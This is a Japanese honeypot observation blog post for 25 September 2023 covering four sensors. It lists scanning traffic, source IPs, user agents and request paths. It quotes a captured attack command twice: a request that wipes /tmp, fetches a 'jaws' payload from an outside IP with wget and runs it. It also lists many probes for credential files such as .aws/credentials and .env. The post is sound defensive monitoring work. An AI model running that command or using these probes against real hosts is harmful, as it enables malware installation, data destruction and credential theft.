コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/09/25 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/09/25分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP
Location:US

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
curlによるスキャン行為
.cssへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  107.6.255.132/jaws;
sh /tmp/jaws
Location:UK

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス

を確認しました。

Location:SG

Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
Gh0stRATのような動き

を確認しました。

アクセス数推移

JP:総アクセス数:87 (前日比:-871)
US:総アクセス数:78 (前日比:-87)
UK:総アクセス数:69 (前日比:-160)
SG:総アクセス数:129 (前日比:63)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
15 43.154.141.71 Singapore
1 45.56.108.128 United States
1 45.79.128.205 United States
1 45.79.181.94 United States
1 45.79.205.209 United States
1 64.62.197.34 United States
2 65.49.20.69 United States
1 85.204.116.176 Romania
1 91.240.118.29 Russia
1 104.192.0.50 United States
1 107.170.239.39 United States
6 109.123.248.106 Czechia
2 109.237.98.53 Russia
11 121.46.25.189 China
1 134.122.118.79 United States
11 135.125.217.54 France
6 135.125.244.48 France
1 146.190.111.14 United States
1 167.94.145.54 United States
1 167.248.133.38 United States
1 179.43.162.94 Panama
4 185.216.71.116 Bulgaria
1 185.225.75.247 Bulgaria
6 185.254.196.173 Ukraine
2 185.254.196.186 Ukraine
1 192.241.211.25 United States
3 194.9.172.193 France
1 198.199.106.76 United States
1 198.235.24.17 United States
1 198.235.24.58 United States

UserAgent一覧

件数 UserAgent
15 -
2 Go-http-client/1.1
1 Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)
1 Mozilla/5.0 (Linux; Android 7.1.1; Z982 Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.517
28 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
1 \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML
1 \"Mozilla/5.0 (Windows NT 6.1; rv
1 \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML
1 like Gecko) Chrome/17.0.963.56 Safari/535.11\"
1 like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4094.1 Safari/537.36\"
1 like Gecko) Version/5.1 Safari/534.50\"
4 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_18.179.20.5_80\n
13 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
28 GET /.env HTTP/1.1
4 GET /.git/config HTTP/1.1
1 GET /Global-Appointment HTTP/1.1
1 GET /GlobalAppointment HTTP/1.1
1 GET /NetherlandsAppointment/ HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /cgi-bin/login.cgi?requestname=2&cmd=0 HTTP/1.1
1 GET /cgi-bin/login.cgi?requestname=3&cmd=0 HTTP/1.1
1 GET /config.php HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /sendgrid/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /ui/login.php HTTP/1.1
1 GET /v3/time HTTP/1.1
15 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 34.42.228.244 United States
3 45.8.22.14 Spain
1 45.33.102.138 United States
1 45.56.117.237 United States
1 45.79.128.205 United States
1 45.79.172.21 United States
2 45.79.181.251 United States
14 54.37.79.75 France
1 54.86.190.49 United States
1 64.62.197.96 United States
1 64.62.197.97 United States
1 80.91.223.131 Germany
3 83.97.73.87 Germany
1 85.239.242.253 Czechia
1 91.240.118.29 Russia
4 103.83.144.161 India
1 134.122.118.79 United States
1 139.144.173.112 United States
1 139.144.186.147 United States
1 141.95.157.33 France
1 157.245.144.50 United States
2 167.94.138.34 United States
21 172.104.4.17 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
2 172.105.128.12 United States
1 174.129.153.93 United States
1 184.105.247.194 United States
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.213.27 United States
1 194.165.16.37 Panama
1 198.98.51.170 United States
1 198.199.93.66 United States

UserAgent一覧

件数 UserAgent
28 -
5 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
15 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
18 curl/7.54.0
3 python-requests/2.31.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_34.68.118.83_80\n
3 \x03
3 \x16\x03\x01\x02
13 \x16\x03\x01
4 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT ipinfo[.]io:443 HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1
1 GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /CSS/Miniweb.css HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /Portal/Portal.mwsl HTTP/1.1
1 GET /Portal0000.htm HTTP/1.1
1 GET /__Additional HTTP/1.1
2 GET /actuator/gateway/routes HTTP/1.1
1 GET /cdn-cgi/trace HTTP/1.1
1 GET /default.cfm HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hF6x HTTP/1.1
1 GET /main.asp HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /nmaplowercheck1695578834 HTTP/1.1
1 GET /pools HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.132/jaws;sh+/tmp/jaws
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
4 POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
1 POST /scripts/WPnBr.dll HTTP/1.1
1 POST /sdk HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.206.213 Russia
1 45.33.80.243 United States
1 45.33.102.138 United States
1 45.56.117.237 United States
1 45.79.128.205 United States
2 45.79.181.104 United States
1 45.79.181.179 United States
2 45.79.181.251 United States
1 45.79.205.209 United States
10 51.79.29.48 Canada
6 54.36.115.221 France
2 64.227.146.163 United States
1 66.175.213.4 United States
1 71.6.134.232 United States
4 71.6.167.142 United States
1 74.82.47.4 United States
1 80.66.88.204 Russia
1 80.91.223.131 Germany
3 83.97.73.87 Germany
1 107.170.232.21 United States
1 107.170.234.40 United States
1 134.122.118.79 United States
1 139.144.173.111 United States
1 139.144.173.112 United States
1 139.144.186.147 United States
1 157.245.144.50 United States
2 167.248.133.123 United States
1 172.104.11.4 United States
1 172.104.11.51 United States
1 172.104.242.173 United States
1 172.105.128.12 United States
2 178.128.51.88 United States
1 180.149.125.170 Mongolia
1 185.170.144.3 Estonia
4 185.216.71.116 Bulgaria
1 192.99.9.171 Canada
1 192.155.90.118 United States
1 192.241.236.32 United States
1 198.235.24.156 United States
1 205.210.31.199 United States
2 216.218.206.66 United States

UserAgent一覧

件数 UserAgent
27 -
6 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
3 Mozilla/5.0
4 python-requests/2.28.2

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 MGLNDD_132.145.66.34_80\n
1 SSH-2.0-libssh2_1.10.0
2 \x03
1 \x16\x03\x01\x01\x07\x01
17 \x16\x03\x01
6 CONNECT google[.]com:443 HTTP/1.1
16 GET /.env HTTP/1.1
4 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /c/ HTTP/1.1
3 GET /cdn-cgi/trace HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.245.5.153 United States
1 38.68.52.222 United States
1 41.250.195.48 Morocco
1 45.33.102.138 United States
1 45.56.108.128 United States
1 45.56.117.237 United States
2 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.223 United States
1 45.79.205.209 United States
1 45.135.232.28 Russia
9 51.79.29.48 Canada
2 51.159.164.227 France
4 54.36.115.221 France
6 54.37.79.75 France
55 54.160.70.145 United States
1 66.45.253.170 United States
2 66.175.213.4 United States
1 66.240.205.34 United States
1 80.66.88.211 Russia
1 80.91.223.131 Germany
2 83.97.73.87 Germany
4 85.208.114.140 Cyprus
4 94.102.49.193 United Kingdom
1 134.122.118.79 United States
1 138.68.208.38 United States
1 139.144.173.111 United States
1 139.144.173.112 United States
1 139.144.186.147 United States
1 142.93.38.69 United States
1 159.203.192.11 United States
2 167.94.138.36 United States
2 172.104.11.4 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
1 180.149.125.164 Mongolia
2 184.105.139.70 United States
1 184.105.247.196 United States
1 185.170.144.3 Estonia
1 192.241.216.41 United States
1 193.35.18.76 Bulgaria
1 193.35.18.187 Bulgaria
1 198.235.24.11 United States
1 205.210.31.25 United States

UserAgent一覧

件数 UserAgent
26 -
8 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
59 Mozilla/5.0 (Windows NT 10.0; Win64; x64)
1 Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
21 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0 zgrab/0.x
1 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 Gh0st\xad
1 MGLNDD_13.67.44.234_80
2 \x03
16 \x16\x03\x01
8 CONNECT google[.]com:443 HTTP/1.1
1 GET /.aws/cloudformation/ HTTP/1.1
1 GET /.aws/cloudwatch/ HTTP/1.1
1 GET /.aws/config.yaml HTTP/1.1
2 GET /.aws/config HTTP/1.1
1 GET /.aws/configurations HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.aws/ec2/ HTTP/1.1
1 GET /.aws/iam/ HTTP/1.1
1 GET /.aws/keypairs/ HTTP/1.1
1 GET /.aws/keys.conf HTTP/1.1
1 GET /.aws/kms/ HTTP/1.1
1 GET /.aws/lambda/ HTTP/1.1
1 GET /.aws/rds/ HTTP/1.1
1 GET /.aws/s3/config.json HTTP/1.1
1 GET /.aws/s3/credentials.ini HTTP/1.1
1 GET /.aws/s3/secrets.yaml HTTP/1.1
1 GET /.aws/secret_access_key.txt HTTP/1.1
1 GET /.aws/secrets/ HTTP/1.1
1 GET /.aws/secretsmanager/ HTTP/1.1
1 GET /.aws/ses/ HTTP/1.1
1 GET /.aws HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.example HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env/backup HTTP/1.1
23 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /.hg HTTP/1.1
1 GET /.s3cfg HTTP/1.1
1 GET /.svn HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //api/.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?phpinfo=1 HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /ads.txt HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /app/config/parameters.yml HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/default.json HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /env.js HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /home/.aws/credentials HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /info.php HTTP/1.1
1 GET /infophp.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /root/.aws/credentials HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /web/.env HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0